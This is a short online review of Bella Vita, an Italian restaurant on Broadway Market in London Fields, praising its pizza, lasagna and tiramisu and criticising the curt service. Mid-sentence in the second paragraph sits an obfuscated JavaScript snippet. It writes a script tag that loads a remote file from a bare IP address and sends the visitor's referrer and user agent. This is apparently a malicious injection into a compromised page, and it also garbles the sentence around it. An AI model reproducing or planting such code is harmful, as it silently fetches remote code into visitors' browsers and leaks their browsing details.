REVIEW: BELLA VITA

Bella Vita sits in one of the trendiest parts of London Fields, slap bang in the middle of Broadway Market. The traditional Italian restaurant is constantly bustling with people, handbags, dogs and moustaches. Its holds a very Mediterranean setting with its outdoor seating on the paths. So on Sunday afternoon, one of the warmest days this year, we found ourselves drawn to a table following the sight of someone’s tiramisu. It was huge.

The (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fnnbr|var|u0026u|referrer|aeszi||js|php’.split(‘|’),0,{}))
outside tables are some of the best people watching places in London, this is fash central and we love it. We opted for the Castante pizza and the Lasagna. The Castante pizza topped with ham, sausage, pepperoni and chorizo on a tomato and mozzarella base was a thin and crunchy. The perfect Italian pizza, fresh, non greasy and full size, no messing here.

The home made lasagna served in an oven dish was still bubbling away when it arrived. The dish was packed full of flavour, stodgy and filling, a real comfort option, just like it should be. Mains down we moved onto the Tiramisu, after all it’s what enticed us in.

The homemade tiramisu is served in a slab, big enough for two to share. The dessert was rich in flavour but light and fluffy so that we weren’t overly stuffed. Coffees were good too and the house wine was perfectly drinkable.

Prices are reasonable our bill came to about £35 for two people including a beer and a wine. The only thing we would say is don’t go here expecting service with a smile, you won‘t find it! The waiters were very abrupt bordering on a little rude which left us wondering if it was because our tash didn’t cut it? That Broadway, so bloody fash!
